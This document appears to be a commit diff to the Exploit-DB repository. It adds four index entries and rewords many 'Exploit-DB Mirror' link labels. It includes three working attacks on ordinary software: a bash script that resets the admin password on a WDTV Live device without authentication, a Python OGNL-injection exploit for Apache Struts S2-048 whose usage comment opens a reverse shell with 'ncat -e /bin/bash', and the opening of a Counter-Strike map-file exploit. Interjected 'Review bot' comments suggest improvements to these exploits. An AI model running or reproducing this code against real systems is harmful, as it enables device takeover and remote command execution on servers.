DB: 2017-07-15
4 new exploits
Counter Strike: Condition Zero - '.BSP' Map File Code Execution
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
WDTV Live SMP 2.03.20 - Remote Password Reset
parent
2f83b6c1be
commit
635e0e935f
51 changed files with 784 additions and 54 deletions
|
@ -9132,6 +9132,7 @@ id,file,description,date,author,platform,type,port
|
|||
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
|
||||
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
|
||||
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
|
||||
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15693,6 +15694,7 @@ id,file,description,date,author,platform,type,port
|
|||
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
|
||||
42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
|
||||
42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
|
||||
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38134,3 +38136,5 @@ id,file,description,date,author,platform,type,port
|
|||
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
|
||||
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
|
||||
|
|
|
|
@ -1,6 +1,6 @@
|
|||
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
|
||||
|
||||
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-08-18]
|
||||
|
|
|
@ -3,6 +3,9 @@ This exploit was leaked on the Full Disclosure mailing list:
|
|||
http://seclists.org/fulldisclosure/2012/Jun/404
|
||||
|
||||
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
|
||||
|
||||
|
||||
BSD telnetd Remote Root Exploit *ZERODAY*
|
||||
By Kingcope
|
||||
Year 2011
|
||||
|
@ -48,6 +51,3 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
|
|||
02:41:51 UTC 2011
|
||||
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
|
||||
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
|
||||
|
||||
|
|
|
@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
|
|||
Root-Node
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
|
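--- /dev/null
+++ b/platforms/hardware/webapps/42326.txt
@@ -0,0 +1,63 @@
+#######################################################
+## WDTV Live SMP Remote Password Reset Vulnerability ##
+#######################################################
+
+Date: Jul 14 2017
+Author: sw1tch
+Demo: https://www.sw1tch.net/2017/07/12/wdtv-live-smb-exploit/
+Description: A simple remotely exploitable web application vulnerability
+for the WDTV Live Streaming Media Player and possibly other WDTV systems.
+
+-INTRO-
+
+The WDTV Live SMP is a is a consumer device produced by Western Digital
+that plays videos, images, and music from USB drives. It can play
+high-definition video through an HDMI port, and standard video through
+composite video cables. It can play most common video and audio formats. As
+of August 2016, the WDTV appears to be discontinued.
+
+The latest firmware version appears to be 2.03.20.
+
+-VULNERABILITY-
+
+The WDTV Live SMP runs an embedded webserver, allowing authenticated users
+to upload themes, manage device settings, access a virtual remote and other
+tasks. To authenticate, a user needs to provide the correct password (no
+username).
+
+An unauthenticated attacker can update the password via a constructed GET
+request, subsequently taking control of many functions of the device.
+
+Vulnerable versions include at least firmware 2.03.20, and likely many more
+older versions.
+
+-POC-
+
+#!/bin/bash
+
+echo
+echo "WDTV Live SMP Admin Password Reset Exploit"
+echo "Apparently sw1tch found this guff in 2017"
+echo
+if [ $# != 2 ]; then
+echo "Usage: `basename $0` <target IP/host> <new password>"
+echo
+exit $ERR_ARG
+fi
+
+# Vars...
+target=$1
+password=$2
+
+echo -n "[*] Slamming your chosen password at $target now..."
+curl "http://$target/DB/modfiy_pw.php" -d "password=$password"
+echo "done!"
+echo "[*] Try logging in to http://$target/ using $password"
+echo
+exit 0
+
+-FIX-
+
+None available. Device appears to be EOL so unlikely to be remediated.
+
+--------------------------------------------------------------------------------------------------------------------------------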
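Review bot: The -VULNERABILITY- text says the password is changed "via a constructed GET request", but the PoC's `curl "http://$target/DB/modfiy_pw.php" -d "password=$password"` sends a POST, so the description and the script disagree and one should be corrected to match the request actually made. In the usage branch `exit $ERR_ARG` references a variable that is never assigned, so an argument-count error exits with the status of the preceding `echo` (0); `exit 1` gives callers a real failure code, and `[ "$#" -ne 2 ]` is the numeric form of the test. The -FIX- section states only that no patch exists; since the device is described as EOL, a sentence recommending that its web interface be kept unreachable from untrusted networks, and that unauthenticated requests to that path be watched for in proxy or firewall logs, would give readers something actionable.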
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
|
||||
*/
|
||||
|
||||
--------------------------------------------------- decr.c ---------------------------------------------------
|
||||
|
|
|
@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
|
|
@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
|
|||
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
|
@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
|
|||
|
||||
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
|
||||
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
|
||||
...
|
||||
$ strings strings-bfd-badptr2
|
||||
|
|
|
@ -9,6 +9,6 @@
|
|||
# CVE : N/A
|
||||
|
||||
Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
|
||||
|
||||
Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html
|
|
@ -125,5 +125,5 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=
|
|||
|
||||
|
||||
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
|
||||
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||||
|
||||
|
|
|
@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -4,6 +4,6 @@
|
|||
Quick and dirty exploit for this one:
|
||||
|
||||
http://www.frasunek.com/proto_ops.tgz
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : No CVE, no patch just 0Day
|
||||
# State : Critical
|
||||
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
|
||||
---------------Description-----------------
|
||||
|
||||
|
|
|
@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
|
|||
Avaya Intuity AUDIX LX 1.0
|
||||
Avaya Intuity AUDIX
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
|
||||
Author: RoMaNSoFt <roman@rs-labs.com>
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
|
||||
# milw0rm.com [2007-11-02]
|
||||
|
|
|
@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
|
|||
VMWare ESX Server 3.5 ESX350-200910401
|
||||
VMWare ACE 2.5.3 Build 185404
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
|
@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
|
|||
Ghostscript Ghostscript 8.54
|
||||
Ghostscript Ghostscript 8.15
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
51
platforms/multiple/webapps/42324.py
Executable file
51
platforms/multiple/webapps/42324.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
# Just a demo for CVE-2017-9791
|
||||
|
||||
|
||||
import requests
|
||||
|
||||
|
||||
def exploit(url, cmd):
|
||||
print("[+] command: %s" % cmd)
|
||||
|
||||
payload = "%{"
|
||||
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
||||
payload += "(#_memberAccess?(#_memberAccess=#dm):"
|
||||
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
|
||||
payload += "(#ognlUtil.getExcludedClasses().clear())."
|
||||
payload += "(#context.setMemberAccess(#dm))))."
|
||||
payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
|
||||
payload += "}"
|
||||
|
||||
data = {
|
||||
"name": payload,
|
||||
"age": 20,
|
||||
"__checkbox_bustedBefore": "true",
|
||||
"description": 1
|
||||
}
|
||||
|
||||
headers = {
|
||||
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
|
||||
}
|
||||
requests.post(url, data=data, headers=headers)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print("python %s <url> <cmd>" % sys.argv[0])
|
||||
sys.exit(0)
|
||||
|
||||
print('[*] exploit Apache Struts2 S2-048')
|
||||
url = sys.argv[1]
|
||||
cmd = sys.argv[2]
|
||||
|
||||
exploit(url, cmd)
|
||||
|
||||
# $ ncat -v -l -p 4444 &
|
||||
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
|
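Review bot: `sys.exit(0)` in the argument-count check reports success for a usage error; `sys.exit(1)` lets a calling shell tell the two apart. `exploit` discards the return value of `requests.post`, so nothing distinguishes a rejected request from an accepted one; capturing the response and reporting its status code would make the demo's outcome legible. The `Referer` header is fixed to `http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster` regardless of `url`, and `requests` is a third-party dependency the file header does not mention — a comment stating whether the Referer value matters and noting the dependency would help readers.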
|
@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
|
|||
---
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
|
|
@ -27,5 +27,5 @@ Test Environment:
|
|||
|
||||
====================================================================
|
||||
Download the following file for more instructions and exploits:
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
|
||||
====================================================================
|
|
@ -22,5 +22,5 @@ Cheers!
|
|||
# - A valid account as at least a user
|
||||
# - The target to have outgoing internet connectivity
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
|
||||
|
||||
|
|
|
@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
|
|||
|
||||
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
|
||||
|
||||
|
|
|
@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
|
|||
|
||||
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
|
||||
|
|
|
@ -19,7 +19,7 @@ DoS("DoS");
|
|||
|
||||
-------------------------
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
|
||||
|
||||
Regards
|
||||
|
||||
|
|
|
@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
|
|||
Proof of concept included.
|
||||
|
||||
http://www21.zippyshare.com/v/83302158/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
|
||||
|
|
|
@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
|
|||
Proof of concept included.
|
||||
|
||||
http://www42.zippyshare.com/v/23669551/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
|
||||
|
|
|
@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
|
|||
################################################################################
|
||||
Proof of concept included.
|
||||
http://www21.zippyshare.com/v/83302158/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
|
||||
|
|
|
@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
|
|||
################################################################################
|
||||
Proof of concept included.
|
||||
|
||||
Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
|
||||
http://www39.zippyshare.com/v/91522221/file.html
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
|
||||
|
||||
|
|
|
@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
|
|||
176efdb4 000003e8
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
|
|
@ -1,4 +1,4 @@
|
|||
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
|
||||
|
||||
#!/usr/bin/perl -w
|
||||
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
|
||||
|
|
|
@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
|
|||
3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
|
||||
4 . the otherside's yahoo! messenger will be crashed.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
|
||||
|
||||
# milw0rm.com [2007-08-29]
|
||||
|
|
|
@ -16,5 +16,5 @@
|
|||
# also check here for The Persian docs of this methods and more :
|
||||
http://www.0days.ir/article/
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
|
||||
|
||||
|
|
|
@ -149,4 +149,4 @@ stores in stack :D
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
|
||||
|
|
|
@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
|
|||
|
||||
@w3bd3vil and @abh1sek
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
|
||||
|
||||
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
|
||||
=================================================================
|
||||
|
|
|
@ -32,4 +32,4 @@ Trendmicro, CDC
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
|
|
@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
|
|||
2. Select all the content in the editor
|
||||
3. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
|
||||
## EDB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
|
||||
# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
|
||||
|
||||
|
||||
Platform: Windows 8.1 Update 32/64 bit (No other OS tested)
|
||||
|
|
|
@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
|
|||
context-dependent attacker to corrupt memory and potentially execute
|
||||
arbitrary code.
|
||||
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
|
|
@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
|
|||
context-dependent attacker to corrupt memory and potentially execute
|
||||
arbitrary code.
|
||||
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
|
|
@ -12,10 +12,10 @@ R136a1 / hfiref0x
|
|||
## Compiled EXE:
|
||||
### x86
|
||||
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
|
||||
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
|
||||
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
|
||||
### x64
|
||||
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
|
||||
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
|
||||
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
|
||||
|
||||
Source Code:
|
||||
https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip
|
||||
|
|
|
@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189
|
|||
3. Browse with a victim IE to `vbscript_bypass_pm.html`.
|
||||
4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
|
||||
|
||||
EDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
|
237
platforms/windows/local/42325.py
Executable file
237
platforms/windows/local/42325.py
Executable file
|
@ -0,0 +1,237 @@
|
|||
#!/usr/bin/env python
|
||||
# Counter Strike: Condition Zero BSP map exploit
|
||||
# By @Digital_Cold Jun 11, 2017
|
||||
#
|
||||
# E-DB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42325.zip (bsp-exploit-source.zip)
|
||||
#
|
||||
from binascii import hexlify, unhexlify
|
||||
from struct import pack, unpack
|
||||
import math
|
||||
import mmap
|
||||
import logging
|
||||
|
||||
fmt = "[+] %(message)s"
|
||||
|
||||
logging.basicConfig(level=logging.INFO, format=fmt)
|
||||
l = logging.getLogger("exploit")
|
||||
|
||||
# Specific to the file
|
||||
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
|
||||
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
|
||||
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
|
||||
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
|
||||
|
||||
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
|
||||
# SEH_OVERWRITE_OFF = 0x4126C
|
||||
|
||||
# Initial offset into the index buffer where the function to exploit resides
|
||||
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
|
||||
|
||||
# INDEX_BUFFER
|
||||
# 0: 20
|
||||
# 1: 10
|
||||
# 2: 2 --> Vertex Buffer Indexes
|
||||
|
||||
# VERTEX BUFFER INDEXES
|
||||
# 0: 1
|
||||
# 1: 2
|
||||
